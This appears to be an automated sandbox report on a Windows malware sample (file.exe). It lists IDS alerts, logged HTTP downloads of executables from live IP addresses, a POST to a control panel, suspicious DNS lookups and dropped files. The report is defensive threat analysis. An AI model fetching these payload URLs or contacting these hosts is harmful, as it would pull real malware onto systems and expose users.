Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49843 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49816 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50017 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50021 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50022 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50023 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50025 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50028 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50032 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50031 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50033 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50034 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50036 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50039 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50040 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50038 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50041 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50043 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50044 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50045 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50050 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50051 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50056 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50058 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50061 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50063 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50067 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50066 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50068 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50069 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50070 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50073 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50019 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50062 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50075 -> 172.67.132.7:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F6E0C0 recv,recv,recv,recv,

0_2_00F6E0C0

Source: global traffic	HTTP traffic detected: GET /test/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/1506757897/Dd7mHw1.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/5876083921/tbd0KQd.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/899392756/artVssK.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/6069966613/VDoTjfk.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/6332377394/D95Ju8g.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/7809335824/ZNWzk16.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/7124748205/mQvinTe.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/armen/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/kitty/random.exe HTTP/1.1Host: 31.41.244.11

Source: global traffic	DNS traffic detected: DNS query: fluid-draw.sourceforge.io
Source: global traffic	DNS traffic detected: DNS query: fancywaxxers.shop
Source: global traffic	DNS traffic detected: DNS query: nearycrepso.shop
Source: global traffic	DNS traffic detected: DNS query: abruptyopsn.shop
Source: global traffic	DNS traffic detected: DNS query: wholersorie.shop
Source: global traffic	DNS traffic detected: DNS query: framekgirus.shop
Source: global traffic	DNS traffic detected: DNS query: tirepublicerj.shop
Source: global traffic	DNS traffic detected: DNS query: noisycuttej.shop
Source: global traffic	DNS traffic detected: DNS query: rabidcowse.shop
Source: global traffic	DNS traffic detected: DNS query: cloudewahsj.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sputnik-1985.com
Source: global traffic	DNS traffic detected: DNS query: undesirabkel.click
Source: global traffic	DNS traffic detected: DNS query: cureprouderio.click
Source: global traffic	DNS traffic detected: DNS query: vanaheim.cn

Source: unknown

HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: mshta.exe, 0000001E.00000003.2462160832.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000002.2468361846.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.2443813104.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.2
Source: powershell.exe, 00000022.00000002.2572108118.0000000004D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2572108118.0000000004C1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16
Source: powershell.exe, 00000069.00000002.2817717444.000002050015D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000069.00000002.2817717444.0000020500001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: powershell.exe, 00000069.00000002.2817717444.00000205004AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeX
Source: powershell.exe, 00000022.00000002.2646143574.00000000072CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microI
Source: powershell.exe, 00000049.00000002.2657950479.000001DB862D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D49D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000020.00000002.2541318032.000001EC4F73F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2541318032.000001EC4F882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2624453025.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2719740796.000001ED10072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2719740796.000001ED101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.3100010498.000001DB98314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.3100010498.000001DB981D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.3216362888.000002072779F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000005B.00000002.2773479662.000002071790B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000020.00000002.2487525339.000001EC3F6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2572108118.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3013201178.000001D3CF201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2563057347.000001ED00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.2680228301.000001DB88161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.2773479662.00000207176E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000069.00000002.2817717444.0000020500103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000005B.00000002.2773479662.000002071790B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: rsn.exe.6.dr	String found in binary or memory: http://www.tgrmn.com/bru.htm
Source: powershell.exe, 00000020.00000002.2487525339.000001EC3F6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3013201178.000001D3CF201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2563057347.000001ED00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.2680228301.000001DB88161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.2773479662.00000207176E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000069.00000002.2817717444.000002050004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000069.00000002.2817717444.000002050005E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000022.00000002.2572108118.00000000049F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBfq
Source: powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D4C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D4F3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.2456609014.000002A56D557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000005B.00000002.2773479662.000002071790B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000020.00000002.2487525339.000001EC40301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2563057347.000001ED00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.2680228301.000001DB88D8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.2773479662.000002071830B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000069.00000002.2817717444.0000020500521000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000005B.00000002.3236652495.000002072F845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsofy
Source: powershell.exe, 00000020.00000002.2541318032.000001EC4F73F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2541318032.000001EC4F882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2624453025.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2719740796.000001ED10072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2719740796.000001ED101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.3100010498.000001DB98314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.3100010498.000001DB981D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.3216362888.0000020727751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000026.00000003.2456609014.000002A56D4C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: cmd.exe

Process created: 53

System Summary

.NET source code contains very large array initializations

Source: ZNWzk16[1].exe.6.dr, -----------------------------------------.cs	Large array initialization: _206F_202E_206A_202C_200D_202C_202D_202C_202D_206C_202A_206C_206D_202E_206F_202D_206E_202C_200D_202C_206E_202C_202A_202B_200F_206A_206D_202D_200F_206B_206D_200C_200B_202C_206C_200E_200F_206D_200F_206F_202E: array initializer size 136704
Source: ZNWzk16.exe.6.dr, -----------------------------------------.cs	Large array initialization: _206F_202E_206A_202C_200D_202C_202D_202C_202D_206C_202A_206C_206D_202E_206F_202D_206E_202C_200D_202C_206E_202C_202A_202B_200F_206A_206D_202D_200F_206B_206D_200C_200B_202C_206C_200E_200F_206D_200F_206F_202E: array initializer size 136704

Creates HTA files

Source: C:\Windows\System32\cmd.exe

File created: C:\Temp\random.hta

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F65C83	0_2_00F65C83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6735A	0_2_00F6735A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA8860	0_2_00FA8860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F64DE0	0_2_00F64DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F64B30	0_2_00F64B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_008378BB	1_2_008378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00837049	1_2_00837049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00838860	1_2_00838860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_008331A8	1_2_008331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_007F4B30	1_2_007F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00832D10	1_2_00832D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_007F4DE0	1_2_007F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0083779B	1_2_0083779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00827F36	1_2_00827F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_008378BB	2_2_008378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00837049	2_2_00837049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00838860	2_2_00838860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_008331A8	2_2_008331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_007F4B30	2_2_007F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00832D10	2_2_00832D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_007F4DE0	2_2_007F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0083779B	2_2_0083779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00827F36	2_2_00827F36
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_00411079	7_2_00411079
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_00411C20	7_2_00411C20
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_00411033	7_2_00411033
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_00410C80	7_2_00410C80
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_00410CA0	7_2_00410CA0
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_0040B9C7	7_2_0040B9C7
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_0040FA68	7_2_0040FA68
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_0040CF18	7_2_0040CF18
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_0040EFF0	7_2_0040EFF0
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_00410FB0	7_2_00410FB0
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_00411079	12_2_00411079
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_00411C20	12_2_00411C20
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_00411033	12_2_00411033
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_00410C80	12_2_00410C80
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_00410CA0	12_2_00410CA0
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_0040B9C7	12_2_0040B9C7
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_0040FA68	12_2_0040FA68
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_0040CF18	12_2_0040CF18
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_0040EFF0	12_2_0040EFF0
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_00410FB0	12_2_00410FB0
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_000C7049	56_2_000C7049
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_000C8860	56_2_000C8860
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_000C78BB	56_2_000C78BB
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_000C31A8	56_2_000C31A8
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_00084B30	56_2_00084B30
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_000C2D10	56_2_000C2D10
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_00084DE0	56_2_00084DE0
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_000B7F36	56_2_000B7F36
